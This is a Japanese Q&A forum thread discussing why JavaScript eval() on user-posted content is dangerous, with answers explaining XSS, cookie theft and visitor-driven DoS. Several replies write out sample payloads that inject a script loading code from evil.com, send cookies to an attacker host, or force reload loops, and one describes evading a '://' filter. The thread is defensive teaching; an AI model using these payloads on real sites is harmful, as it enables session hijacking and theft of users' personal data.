eval()の危険性の具体例を教えてくれませんか？

> No.7 こちらこそ、うだうだとすみません。 私が知らないだけで、eval()の危険性はあるかもしれません。 サイト管理者しか投稿・更新できないのであれば、サイト管理者が悪意のあるコードを投稿しなければ済むだけですが。 セキュリティー関係のサイトを見ていると、考えられないような（実行して下さいと言わんばかりの）コードを紹介していたりしますし、 実際に、<iframe>タグを投稿できるサイトもありましたから、 ともすれば、前の人の投稿内容が、記入欄に残っているようなサイトもあるかもしれません。 （投稿確認->戻る（投稿内容が記入済み）->ブラウザ終了->他の人が表示。で、前の投稿が残ってるとか？) そうなれば、No.4に書かれたようなスクリプトを制作者が用意しておくだけでも、十分危険だと思います。 NO.6 最後のコード これでもよさそう。（NO.4と同じになります) 当然悪意のあるコードが投稿されれば、それが実行されます。 <script>タグの投稿許可でも同じですが、 セキュリティーチェック（安全なコードかどうかの確認）もなしに投稿・実行を許可しているのであれば、危険な事は容易に推測できるはずですし、やはり狙ってるとしか思えないですね。 -------------------- <script> function run(id){ eval(document.getElementById(id).innerText || document.getElementById(id).textContent); } </script> <pre><tt id="post1"> ユーザーが投稿したスクリプト </tt></pre> <a onclick="run('post1');">実行</a> -------------------- > XMLHttpRequestで他のサイトにポストするコードを実行されても、サーバー側で困る事はないと思うのですが。 言い忘れてましたが、JavaScriptそのものが影響する事はありません。 <script>onload=location.reload();</script> でもやられたらともかく、 通常はウイルスの感染を狙いそのウイルスがサーバーを狙うので、むしろ多くのスクリプトがサーバーに影響する可能性があります。

No.4です。 > No.5 丁寧な指摘有り難うございます。 仰ることはよくわかります。私が No.3 の補足をしっかりと読まなかったためにいろいろな部分で誤解していました。 もう少し注意深く読む必要があると反省しています。 > *例として出されているURLは実存するため、そういう所は使わない方が良いと思います。 確かに。今後気をつけたいと思います。 親切にありがとうございました。

> No.4 > コードが掲示板のDBに登録されると、訪問者全員がこのコードを実行することになります。 アクセス時のコメント記入欄は真っ白なはずなので、その状態では、 eval(document.getElementById('コメント記入欄のID').value); を実行しても、何も起こりません。 HTMLタグ（<script>タグと<textarea>タグ）を投稿できるなら <script>eval(document.getElementById('test').value);</script> の一文と<textarea>タグを投稿する事で、テキストエリアの内容を実行することが可能ですが、 その場合はeval()が問題なのではなく、<script>タグを投稿できる事が問題です。 <script>タグを投稿できるなら、<textarea>もeval()を使う必要はありません。 <script type='text/javascript'> var s = document.createElement("script"); s.type = "text/javascript"; s.src = "http://example.com/evil.js"; document.getElementsByTagName("head")[0].appendChild(s); </script> これを投稿すればいいだけです。 <と>を&lt;、&gt;に変換してあれば、 &lt;script&gt;eval(document.getElementById('test').value);&lt;/script&gt; を投稿した事になりますから、eval()は実行できません。 > No.3 > 投稿したjavascriptのコードを送信する前に、そのページで、evalを使って事前にプレビュー実行も可能(無理なコードがあるのも分かってます)とさせ、登録ボタンを押すとサーバー側のphpに送信します。 > No.2 > ソースコードをPOSTされても受け取るPHPがエスケープした上で、記事として掲載するので、javascript側でevalしても投稿者以外はXSSされないと思います。 とのことで、お節介だと思いますが、 投稿時に1回実行できますが、悪意のあるコードを書いても、おっしゃるとおり単に自爆するだけですね。 他の人が表示したときは<textarea>の内容はクリアされているはずですから、他人のコードは実行出来ません。 という理由のため、eval()を使っても安全（他人に危害を加える事はない）と言えると思います。 要らぬお節介ついでに 他人が書いたコードをeval()できるシステムにするなら、それなりの処理は必要でしょう。 これは<script>タグを投稿できるのと同じです。 （evalの問題ではなく、「他人が投稿したコードを実行できるシステム」という設計が危険です） 私なら、別ページを用意して、<script>の中に直接書いてみます。 -------------------- <pre><tt> ユーザーが投稿したスクリプトを実態参照に変換した物 </tt></pre> <a href="1.html" target="iframe">このユーザーが投稿したスクリプトを試してみる</a> 1.htmlの内容 <body> <script> ユーザーが投稿したスクリプト </script> </body> -------------------- eval()を使う場合はこんな感じでしょうか。 -------------------- <script> function run(s){ eval(s); } </script> <pre><tt> ユーザーが投稿したスクリプトを実態参照に変換した物 </tt></pre> <script> var str1='ユーザーが投稿したスクリプト'; // 'を\/にエスケープするなどした物、面倒ならtextarea.valueでも可 </script> <a onclick="run(str1);>このユーザーが投稿したスクリプトを試してみる</a> -------------------- 簡単な対策は、たとえばスクリプトの中では'://'という文字列を禁止にすると、 絶対パス・相対URL（同一ドメイン内）しかアクセスできなくなります。 ＊geocitiesやSNSなどのドメイン共用サイトでは使えません。 ＊string.replace('/://g') => コロンを削除する正規表現などが投稿できなくなります。 ＊c=':',s='/';src='http'+c+s+s+・・・や、ASCIIコードなどから文字列を生成していると投稿できます。 ＊例として出されているURLは実存するため、そういう所は使わない方が良いと思います。

#4です。 #3の補足を改めて読み直しました。 作ろうとされているページの実装は問題ないと思いますので、#4は聞き流してください。 失礼しました。

#2です。 > ページ自体がサーバー上にあるため、ページに流し込むコードの作成は不可能だと思います。 JavaScriptでコンテンツを流し込むということなのですが、ひょっとして前提が違うのでしょうか？ 私が考えていた前提条件は「投稿者がポストしたコメントの内容を無条件に eval() する」というものです。 <textarea id='test'> の内容が eval() されると仮定すると、下記コードでscript要素を流し込めます。 <textarea id='test'> var s = document.createElement("script"); s.type = "text/javascript"; s.src = "http://evil.com/evil.js"; document.getElementsByTagName("head")[0].appendChild(s); </textarea> <script type='text/javascript'> eval(document.getElementById('test').value); </script> コードが掲示板のDBに登録されると、訪問者全員がこのコードを実行することになります。 JavaScriptからはCookieを取得できるので、取得したCookieをGETパラメータで渡すことも可能だと思います。 > 回答番号:No.2さん指摘のDos攻撃のリスクはeval()つかって無くてもありえる話しなのでjavascriptのeval()の問題点とはいえないかも知れません。 これが危険なのは不特定多数の訪問者からDOS攻撃をされることです。 攻撃者が一人ならIPアドレスでキックすればいいですが、evalで流し込まれると訪問者全員が(意図せず)DOS攻撃をします。 訪問者全てを拒否するわけにはいきませんから、DOS攻撃されうるコードは流し込めないように対策する必要があります。

おそらく、XSSに似た問題だと思うのですが…。 1. 投稿内容を eval() する掲示板がある 2. 悪意ある投稿者が <script type="text/javascript" src="http://evil.com/evil.js?cookie=***"></script> をページに流し込むコードをポスト 3. 以降、そのページを訪れると evil.js が実行され、evil.com管理者にCookieを盗まれる # オートコンプリートを使用していたら、ID,Passwordを盗まれるケースも…。 > ましてサーバー側に影響を及ぼすようなjavascriptとはどんなものなのでしょうか？ サーバ側とは「そのページを管理しているサーバ」のことでしょうか？ eval() で流し込まれたコードでF5アタックされるリスクが…ありますね。 (攻撃者自身がF5アタックするのではなく、そのページを訪れた第三者にF5アタックさせます。) ただ、eval() を避ける理由は訪問者のリスクへの配慮の意味合いが大きいと思います。

まぁ、そのサンプルだったら、別に害はないだろう。 ただ、例えば不特定多数の人間が投稿できるような掲示板とかブログとかで、そうした甘い処理を書いてしまうと問題がある。例えば、JavaScriptで「クッキー情報を「http://○○/××.cgi?cookie=クッキー」みたいな形でURLに追加して別のサイトにジャンプするような処理を書いて投稿する。そのジャンプ先のサイトには、あらかじめ送られてきたクッキー情報を保存するような仕組みを用意しておく。 すると、そのページに誰かがアクセスすると、投稿したJavaScriptが画面に表示される際に実行され、アクセスした人間のクッキー情報を指定のサイトにジャンプして送りつけてしまう。そのサイトの人間は、すぐさま自分のブラウザのクッキー情報をそれにあわせて書き換えてアクセスすれば、盗まれた人間に成りすましてアクセスすることができる。これがクロスサイトスクリプティング（XSS）という攻撃。更に、SQLデータベースを利用しているような場合には、実行するSQL文を偽装する投稿を行い、すべてのIDやパスワードを表示させたりする攻撃もある。 というわけで、ただ単に画面に表示するというようなものであれば問題はないだろうが、送られた情報をどこかに保管し、表示したりするような処理になると、こうしたセキュリティの甘さは場合によって致命的になることがある、ということ。サーバーが壊れるとかいうことより、こうした攻撃で個人情報を盗めるという点が一番被害として大きい。例えば、オンラインバンクやオンラインショップにログインした人が投稿できる掲示板があったとして、そこでクッキー情報が盗まれたらどんなことになるか？と考えると恐ろしいことになる。